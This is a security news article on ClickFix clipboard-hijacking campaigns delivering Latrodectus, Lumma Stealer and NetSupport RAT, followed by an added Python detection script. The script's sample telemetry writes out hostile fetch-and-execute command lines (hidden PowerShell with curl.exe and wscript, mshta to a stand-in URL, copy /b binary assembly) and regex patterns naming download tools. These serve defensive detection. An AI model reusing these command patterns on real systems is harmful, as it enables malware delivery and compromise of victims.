Emerging in late 2024 and surging throughout the first half of 2025, ClickFix has become a pervasive social-engineering vector in which threat actors trick users into executing malicious commands under the guise of "quick fixes" for common computer issues. Rather than relying on exploit kits or malicious attachments, attackers employ clipboard hijacking, injecting obfuscated commands into the victim's clipboard and instructing them to paste and run those commands via Windows shortcuts such as Win+R (the Run dialog) or Win+X (the power-user menu, from which a PowerShell window or terminal can be opened).

At the heart of the ClickFix vector is pastejacking: JavaScript on a malicious webpage overwrites the user's clipboard with an obfuscated command string while displaying innocuous instructions to "verify" or "fix" an issue. Upon pasting into the Run dialog or a terminal, the victim unwittingly executes a script that downloads and stages additional components. Once executed, the script reaches out to the attacker's C2, retrieves the next-stage loader, and initiates a multi-stage infection chain. Three such chains, delivering Latrodectus, Lumma Stealer and NetSupport RAT, are described below.

In the Latrodectus chain, victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard. When executed, the command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer, which sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process.

In the Lumma Stealer chain, as Palo Alto Networks researchers noted, each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script. This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload. The loader carries this out through a series of command-line operations (cmd /c md, copy /b, choice) that extract, assemble, and run the stealer without further user interaction.

In the NetSupport RAT chain, a carefully crafted landing page instructs victims to open the Run dialog (Win+R) and paste an injected PowerShell command, which downloads a ZIP archive containing a malicious DLL loader. That DLL is sideloaded by a legitimate Java executable (jp2launcher.exe); once loaded, it retrieves encrypted payloads (data_3.bin and data_4.bin) using curl.exe and ultimately launches NetSupport RAT's client32.exe in memory.
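The three chains share a small set of observable traits: explorer.exe (the Run dialog) spawning a script host, a command line that fetches with curl.exe or mshta, encoded or hidden-window PowerShell, and a copy /b plus choice sequence that assembles the next stage. The following Python script is an added detection example, not code from the article or from Palo Alto Networks. It encodes those traits as rules, runs them over constructed Sysmon-style process-creation records, and also parses a constructed `reg query` dump of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where commands typed into Win+R are recorded and which is worth checking on a suspect host. All hostnames, paths and file names in the samples are invented for the example, and the trailing "I am not a robot" style comment it looks for is a lure trait commonly seen in ClickFix commands rather than something this article states.

```python
"""Rule-based detection of ClickFix-style process chains (added example, not the
article's or Palo Alto Networks' code). All sample data below is constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 / Security 4688 view: who spawned what, with what."""
    parent_image: str
    image: str
    command_line: str


# Script hosts a pasted ClickFix command lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits from the chains above (curl.exe fetches, per-victim mshta
# URLs, encoded PowerShell, copy /b + choice assembly), plus the hidden-window
# flag and the trailing "verification" comment ClickFix lures commonly carry
# (the comment trait is an assumption, not something the article states).
PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl(\.exe)?|bitsadmin|certutil|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b", re.I),
    "mshta_url": re.compile(r'\bmshta(\.exe)?\s+"?https?://', re.I),
    "encoded_ps": re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "assemble_binary": re.compile(r"\bcopy\s+/b\b", re.I),
    "choice_delay": re.compile(r"\bchoice\b[^&|]*/t\s*\d+", re.I),
    "verify_lure": re.compile(r"#.*\b(robot|verif|captcha)", re.I),
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> dict:
    """Score one event. explorer.exe spawning a script host is exactly what pasting
    into Win+R produces, so that pair alerts on a single command-line hit;
    anywhere else two independent hits are required to keep admin scripts quiet."""
    hits = sorted(name for name, rx in PATTERNS.items() if rx.search(ev.command_line))
    from_run_box = _basename(ev.parent_image) == "explorer.exe" and _basename(ev.image) in SCRIPT_HOSTS
    alert = (from_run_box and len(hits) >= 1) or len(hits) >= 2
    return {"alert": alert, "from_run_box": from_run_box, "hits": hits}


def scan(events):
    """Return (event, verdict) pairs for every event that alerts."""
    return [(ev, verdict) for ev in events if (verdict := classify(ev))["alert"]]


# Win+R history lives in HKCU\...\Explorer\RunMRU as REG_SZ values ending in "\1".
RUNMRU_LINE = re.compile(r"^\s*(?P<name>[a-z])\s+REG_SZ\s+(?P<value>.+?)\\1\s*$", re.I)


def runmru_suspects(reg_query_output: str) -> list:
    """Parse `reg query ...\\RunMRU` output and return commands that start with a
    script host and match at least one ClickFix trait."""
    suspects = []
    for line in reg_query_output.splitlines():
        m = RUNMRU_LINE.match(line)
        if not m:
            continue
        cmd = m.group("value")
        tokens = cmd.split()
        first = _basename(tokens[0]) if tokens else ""
        host_like = first in SCRIPT_HOSTS or first + ".exe" in SCRIPT_HOSTS
        if host_like and any(rx.search(cmd) for rx in PATTERNS.values()):
            suspects.append(cmd)
    return suspects


# Constructed telemetry: two benign events, then one event per chain described above.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\ops\rotate-logs.ps1"),
    # Run box -> hidden PowerShell pulling a JS downloader with curl.exe (Latrodectus-style)
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "curl.exe -s https://example.invalid/dl.js -o $env:TEMP\\dl.js; '
              'wscript $env:TEMP\\dl.js" # Verification ID 7K3F'),
    # Run box -> mshta with a per-victim URL (Lumma-style first stage)
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/a1b2c3 # I am not a robot"),
    # Later stage assembling a binary with copy /b and sleeping via choice (Lumma-style loader)
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c md %TEMP%\x & copy /b %TEMP%\a.bin+%TEMP%\b.bin %TEMP%\x\run.com & choice /d y /t 5 & %TEMP%\x\run.com"),
]

# Constructed `reg query HKCU\...\RunMRU` output.
SAMPLE_RUNMRU = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    notepad\1
    b    REG_SZ    powershell -w hidden -c "curl.exe -s https://example.invalid/dl.js -o $env:TEMP\dl.js"\1
    c    REG_SZ    mshta https://example.invalid/a1b2c3 # I am not a robot\1
    MRUList    REG_SZ    cba
"""

if __name__ == "__main__":
    for ev, verdict in scan(SAMPLE_EVENTS):
        print(f"ALERT run_box={verdict['from_run_box']} hits={verdict['hits']}: {ev.command_line}")
    for cmd in runmru_suspects(SAMPLE_RUNMRU):
        print("RunMRU suspect:", cmd)
```

The two-hit threshold outside the explorer.exe parent case is deliberate: curl.exe or a hidden window on its own is common in legitimate automation, while the combination of a Run-dialog parent with any one trait, or two traits together, matches the chains described above and little else. On a live host, pair the RunMRU check with the PowerShell ConsoleHost_history file and Sysmon network events from the script host to confirm the C2 fetch.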
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 18 Jul 2025 08:35:30 +0000